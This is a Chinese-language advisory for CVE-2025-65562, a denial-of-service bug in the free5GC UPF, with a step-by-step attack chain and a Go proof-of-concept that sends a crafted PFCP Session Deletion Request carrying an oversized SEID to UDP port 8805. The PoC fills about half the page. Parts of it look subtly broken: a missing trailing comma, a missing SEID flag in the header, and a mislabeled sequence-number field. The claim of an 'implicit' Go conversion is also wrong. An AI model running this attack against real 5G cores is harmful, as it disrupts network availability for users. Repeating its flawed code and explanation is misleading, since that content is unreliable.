CVE-2025-65562 free5GC UPF SEID整数下溢导致拒绝服务

漏洞信息

漏洞编号

CVE-2025-65562

漏洞类型

整数下溢/缓冲区越界

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

free5GC UPF

漏洞概述

CVE-2025-65562是free5GC项目中UPF（User Plane Function，用户面功能）的安全漏洞。该漏洞源于free5GC UPF在处理PFCP（Packet Forwarding Control Protocol）会话删除请求时，对SEID（Session Endpoint Identifier）参数缺乏边界检查。攻击者可以发送带有超大SEID值的恶意请求，当uint64类型的SEID被转换为int类型时会发生整数下溢，导致负索引访问数组，最终引发Go运行时panic，造成UPF服务崩溃。由于该漏洞无需认证即可利用，攻击者可以在网络上远程触发此漏洞，实现对5G核心网UPF的拒绝服务攻击，影响5G网络的可用性和稳定性。

技术细节

漏洞存在于free5GC UPF的PFCP会话管理模块中，具体位于internal/pfcp/node.go文件的LocalNode.DeleteSess()和LocalNode.Sess()函数中。当处理PFCP Session Deletion Request时，代码直接将uint64类型的SEID转换为int并用于数组索引运算。以SEID值0xFFFFFFFFFFFFFFFF为例，该值转换为int时会发生整数下溢（uint64的最大值转换为int会变成-1）。转换后的负数被用作n.sess数组的索引，导致越界访问。当Go运行时检测到数组越界时，会触发panic异常，导致整个UPF进程崩溃。由于free5GC是Go语言实现的项目，这种整数类型转换在Go中是隐式进行的，且没有额外的边界检查机制。攻击者只需构造一个包含超大SEID的PFCP数据包即可触发漏洞，无需任何认证信息。

攻击链分析

STEP 1

步骤1

攻击者识别目标free5GC UPF的PFCP服务地址（默认端口8805），该服务在5G核心网中负责用户面数据转发

STEP 2

步骤2

攻击者构造恶意的PFCP Session Deletion Request数据包，将SEID字段设置为超大值（如0xFFFFFFFFFFFFFFFF）

STEP 3

步骤3

攻击者通过UDP协议向目标UPF发送构造的数据包，无需任何认证信息

STEP 4

步骤4

UPF的LocalNode.DeleteSess()函数接收到请求后，将uint64类型的SEID隐式转换为int类型

STEP 5

步骤5

uint64最大值0xFFFFFFFFFFFFFFFF转换为int时发生整数下溢，结果为-1

STEP 6

步骤6

转换后的负数被用作n.sess数组的索引，导致越界访问

STEP 7

步骤7

Go运行时检测到数组越界访问，触发panic异常

STEP 8

步骤8

UPF进程崩溃，5G用户面功能中断，实现对目标的拒绝服务攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-65562 PoC - free5GC UPF SEID Integer Underflow
// This PoC sends a PFCP Session Deletion Request with a malicious large SEID

package main

import (
    "encoding/binary"
    "fmt"
    "net"
)

// PFCP Header Structure
type PFCPHeader struct {
    Version        uint8
    Flag           uint8
    MessageType    uint8
    MessageLength  uint16
    SequenceNumber uint32
    Seid           uint64
}

func createPFCPHeader(msgType uint8, seid uint64, seqNum uint32) []byte {
    header := make([]byte, 16)
    // Version (3 bits) + Flags (5 bits)
    header[0] = 0x20 // Version 1
    header[1] = msgType
    // Message Length (will be set later)
    binary.BigEndian.PutUint16(header[2:4], 0x0000)
    // Sequence Number (3 bytes)
    binary.BigEndian.PutUint32(header[4:8], seqNum)
    // SEID
    binary.BigEndian.PutUint64(header[8:16], seid)
    return header
}

func createSessionDeletionRequest(seid uint64) []byte {
    // Create PFCP Session Deletion Request header
    header := createPFCPHeader(0x1D, seid, 0x000001)
    
    // Add IE (Information Element) - Cause
    ie := []byte{
        0x00, 0x02, // IE Type: Cause
        0x00, 0x05, // IE Length
        0x00,       // Spare
        0x10,       // Cause: Delete (request to delete session)
        0x00, 0x00, 0x00 // Spare
    }
    
    message := append(header, ie...)
    // Update message length
    binary.BigEndian.PutUint16(message[2:4], uint16(len(message)-4))
    
    return message
}

func main() {
    fmt.Println("CVE-2025-65562 PoC - free5GC UPF SEID Integer Underflow")
    fmt.Println("Target: free5GC UPF PFCP endpoint (usually port 8805)")
    
    // Malicious SEID that causes integer underflow
    // 0xFFFFFFFFFFFFFFFF will be converted to -1 when cast to int
    maliciousSeid := uint64(0xFFFFFFFFFFFFFFFF)
    
    fmt.Printf("Using malicious SEID: 0x%016X\n", maliciousSeid)
    fmt.Printf("This SEID will underflow to index: %d\n", int(maliciousSeid))
    
    // Create the malicious packet
    packet := createSessionDeletionRequest(maliciousSeid)
    
    fmt.Printf("Sending %d bytes to target...\n", len(packet))
    
    // Connect to UPF (adjust target IP/port as needed)
    conn, err := net.DialUDP("udp", nil, &net.UDPAddr{
        IP:   net.ParseIP("127.0.0.1"),
        Port: 8805,
    })
    
    if err != nil {
        fmt.Printf("Connection error: %v\n", err)
        return
    }
    defer conn.Close()
    
    // Send the malicious packet
    _, err = conn.Write(packet)
    if err != nil {
        fmt.Printf("Send error: %v\n", err)
        return
    }
    
    fmt.Println("Malicious packet sent successfully!")
    fmt.Println("Expected result: UPF panic and crash due to negative array index")
}

影响范围

free5GC < 4.1.0

free5GC UPF v4.1.0（确认受影响）

防御指南

临时缓解措施

目前官方尚未发布正式修复版本，建议采取以下临时缓解措施：1）使用网络ACL限制对UPF PFCP端口（8805/UDP）的访问，仅允许可信来源IP访问；2）部署入侵检测系统（IDS）监控异常的PFCP数据包，检测包含超大SEID值的请求；3）配置防火墙规则过滤异常SEID值的数据包；4）监控UPF服务状态，及时发现并恢复崩溃的服务；5）考虑在UPF前部署负载均衡器，实现故障自动切换，提高系统可用性。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-65562
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-65562
3 Details https://www.cvedetails.com/cve/CVE-2025-65562/
4 VulDB https://vuldb.com/cve/CVE-2025-65562
5 Link https://github.com/free5gc/free5gc/issues/731
6 Link https://github.com/free5gc/free5gc/issues/731